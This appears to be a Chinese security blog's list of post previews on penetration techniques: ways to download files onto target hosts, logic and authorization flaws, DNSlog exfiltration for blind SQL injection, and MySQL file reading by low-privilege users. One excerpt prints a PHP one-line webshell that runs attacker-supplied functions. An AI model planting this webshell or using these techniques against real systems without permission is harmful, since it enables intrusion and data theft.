2019-12-251990阅读笔记收集整理的23种文件下载的方式在我们的渗透过程中,通常会需要向目标主机传送一些文件,来达到提权,维持控制等目的。PowerShell File DownloadPowerShell 是一种winodws原生的脚本语言,对于熟...
2019-12-221749阅读笔记逻辑漏洞与越权整理注册可能存在漏洞:任意用户注册短信轰炸/验证码安全问题/密码爆破批量注册用户枚举用户名/进行爆破SQL注入/存储型XSS登陆短信轰炸/验证码安全问题/密码爆破SQL注入可被撞库空密码绕过/抓包把...
2019-12-211934阅读笔记DNSlog实现无回显注入背景在某些不能直接通过漏洞获得回显信息的情况下,我们可以利用DNSlog来进行突破,在发起DNS请求的时候,会把我们想要得到的数据一同外带出来。在SQL盲注中,最常用的就是二分法了,这种方法不仅...
2019-12-181597阅读笔记一句话木马简单变形1、<?php error_reporting(0); $_GET['POST']($_POST['GET']); ?>eval是一个语言构造器而不是一个函数,不能被可变函数调用&l...
2019-12-032076阅读笔记Mysql低权限用户读取文件0x00 简介Mysql用户在没有File权限的情况下是无法通过load_file()函数读取文件,但是我们可以尝试低权限用户利用load data infile读取文件。[scode type...